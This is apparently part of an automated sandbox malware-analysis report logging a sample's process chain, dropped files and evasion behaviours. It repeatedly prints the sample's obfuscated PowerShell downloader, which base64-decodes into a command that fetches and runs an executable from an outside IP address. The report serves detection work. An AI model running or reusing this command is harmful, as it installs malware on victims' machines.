                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Suspicious command line found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00114B37 LoadLibraryA,GetProcAddress,6_2_00114B37
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00138945 push ecx; ret 6_2_00138958
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004018B1 push esi; iretd 7_2_004018F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004018B1 push esi; iretd 7_2_00401962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401904 push esi; iretd 7_2_00401962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00403110 push eax; ret 7_2_00403112
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402993 push edx; retf 7_2_00402997
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00404B5E pushfd ; retf 7_2_00404B5F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D38B push es; ret 7_2_0040D3AB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401646 push ss; ret 7_2_00401649
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401623 push edi; ret 7_2_00401625
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00406FBC push D22ADE5Ch; retf 7_2_00406FC3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0360135F push eax; iretd 7_2_03601369
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0360225F pushad ; ret 7_2_036027F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0360B008 push es; iretd 7_2_0360B009
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036027FA pushad ; ret 7_2_036027F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03609939 push es; iretd 7_2_03609940
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036309AD push ecx; mov dword ptr [esp], ecx7_2_036309B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0360283D push eax; iretd 7_2_03602858
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026BA3DA push D22ADE5Ch; retf 11_2_026BA3E1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C962C push ss; ret 11_2_026C9632
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026B7F7C pushfd ; retf 11_2_026B7F7D
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C07A9 push es; ret 11_2_026C07C9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A09AD push ecx; mov dword ptr [esp], ecx12_2_052A09B6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323D700 push ebx; retf 12_2_0323D881
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323E536 pushad ; iretd 12_2_0323E54B
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03231A4B pushfd ; retf 12_2_03231A4C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0324DAD0 push esi; retf 12_2_0324DADB
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03233EA9 push D22ADE5Ch; retf 12_2_03233EB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05006576 pushad ; ret 12_2_05006577
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_050057C6 push eax; iretd 12_2_050057C9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05004647 push edi; iretd 12_2_05004648
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cosses.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_001148D7
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00195376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00195376
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00133187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00133187
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
